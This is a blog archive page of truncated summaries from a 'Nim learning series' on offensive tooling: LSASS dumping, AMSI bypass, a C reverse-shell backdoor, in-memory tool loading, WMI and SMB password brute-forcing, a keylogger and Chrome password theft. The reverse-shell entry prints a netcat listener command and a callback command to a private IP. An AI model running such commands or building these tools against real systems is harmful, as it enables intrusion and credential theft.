02 2021 档案

摘要:dump lsass(nim 学习系列) 可以先使用 psexec 获取 system 权限在导出。 nim compile -d:release --opt:size dumpLsass.nim #[ Author: StudyCat Blog: https://www.cnblogs.com/s 阅读全文
posted @ 2021-02-28 23:47 StudyCat 阅读(195) 评论(0) 推荐(0) 编辑
摘要:AMSI 绕过(nim学习系列) AMSI(Anti-Malware Scan Interface),即反恶意软件扫描接口,在win10和server2016上默认安装。如在使用mimikatz的powershell版时候会遇到错误(仅输入"Invoke-Mimikatz"字符串都被拦截)。 实现过 阅读全文
posted @ 2021-02-28 13:53 StudyCat 阅读(561) 评论(0) 推荐(0) 编辑
摘要:dll 创建/加载(nim学习系列) dll 创建 test.nim proc add(a, b: int): int {.stdcall, exportc, dynlib.} = a + b 编译成 dll: nim c --app:lib -d:release test.nim dll 加载 方 阅读全文
posted @ 2021-02-27 20:10 StudyCat 阅读(485) 评论(0) 推荐(1) 编辑
摘要:nim 嵌入C 代码(nim学习系列) 假设手头上有一份现成的 C 代码,比如 PersistentCReverseShell ,这是一个用 C 语言实现的 windows 反弹 shell 后门,请不要上传到 www.virustotal.com 进行扫描。如何快速利用这段代码呢,好在 nim 提 阅读全文
posted @ 2021-02-21 21:47 StudyCat 阅读(763) 评论(0) 推荐(1) 编辑
摘要:内存加载 ladon.exe(nim学习系列) 测试环境 windows 7 x64 + .NET Framework 4.0 Ladon.exe version 7.0 内存加载 Ladon.exe 首先将 ladon.exe 转换成 bytes array,这里使用 nim 的 readByte 阅读全文
posted @ 2021-02-19 22:15 StudyCat 阅读(340) 评论(0) 推荐(0) 编辑
摘要:nim 反弹 shell(nim学习系列) 反弹 netcat shell netcat 监听: nc -vv -l -p 80 nimNC 反弹shell: nimNC 172.20.10.4 80 源代码 nimNC.nim #[ Author: StudyCat Blog: https://w 阅读全文
posted @ 2021-02-18 22:12 StudyCat 阅读(373) 评论(0) 推荐(0) 编辑
摘要:WMI密码批量爆破 先探测目标 IP 地址 135 端口是否开放,后进行密码的扫描。调用 swbemlocator 对象连接目标,然后根据响应信息,判断账密是否正确。除了输出扫描过程,发现的正确账号密码会保存到当前工作目录下的wmilogin.log 文件中。 用法 Usage: wmiLogin. 阅读全文
posted @ 2021-02-07 21:41 StudyCat 阅读(669) 评论(0) 推荐(1) 编辑
摘要:键盘记录器(nim学习系列) 本系列随笔仅用于学习目的,不能保证代码的兼容性和健壮性。 最近学习 @byt3bl33d3r 的Github项目,简单修改 keylogger_bin.nim,将键盘记录信息经过AES加密并保存到文件。 截图 程序将键盘记录输出到控制台的同时,也保存到文件(临时目录下一 阅读全文
posted @ 2021-02-05 22:33 StudyCat 阅读(288) 评论(0) 推荐(1) 编辑
摘要:读取 chrome 浏览器密码(nim学习系列) 全版本 chrome 浏览器支持 仅支持 windows 系统下使用 需要 sqlite3_32.dll或者sqlite3_64.dll 读取当前用户 chrome 浏览器密码 源代码 chromepwd.nim #[ Author: StudyCa 阅读全文
posted @ 2021-02-03 20:36 StudyCat 阅读(480) 评论(0) 推荐(1) 编辑
摘要:SMB密码爆破(nim学习系列) 关键字:windows smb密码爆破;445端口;弱口令扫描; ntlmhash爆破; 使用方法 支持明文密码爆破 支持ntlmhash爆破 通过命令行或者文件导入目标IP地址 先扫描目标IP 445端口,如果开放再进行密码爆破 输出爆破过程,成功密码保持到 sm 阅读全文
posted @ 2021-02-01 20:57 StudyCat 阅读(1689) 评论(0) 推荐(0) 编辑

点击右上角即可分享
微信分享提示